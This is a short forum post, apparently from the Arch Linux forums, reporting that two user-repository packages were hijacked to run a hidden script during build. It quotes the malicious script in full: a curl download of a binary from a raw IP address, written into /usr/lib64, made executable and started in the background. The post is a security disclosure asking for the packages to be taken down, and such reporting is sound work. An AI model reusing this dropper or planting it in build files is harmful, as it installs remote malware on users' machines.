Original post: https://bbs.archlinux.org/viewtopic.php?pid=2270179 -----
I've noticed these two packages being "hijacked": mdbtools and materia-theme-git Both under the same user "koolpp" The new versions uploaded refer to a shell script available at a Codeberg repository: https://codeberg.org/koolpp/mdbtools/src/branch/main/src/util/Makefile.am https://codeberg.org/koolpp/materia-theme/src/branch/main/src/gtk-4.0/meson.build The scripts execute the following: ```sh #!/bin/sh mkdir -p /usr/lib64 curl -s http://45.94.31.147/prod.bin -o /usr/lib64/libkwrk.so.1.5.3 chmod +x /usr/lib64/libkwrk.so.1.5.3 setsid /usr/lib64/libkwrk.so.1.5.3 & ``` Looks like a remote file will create a background session with execute permissions if you install these packages. May these new packages versions be taken down
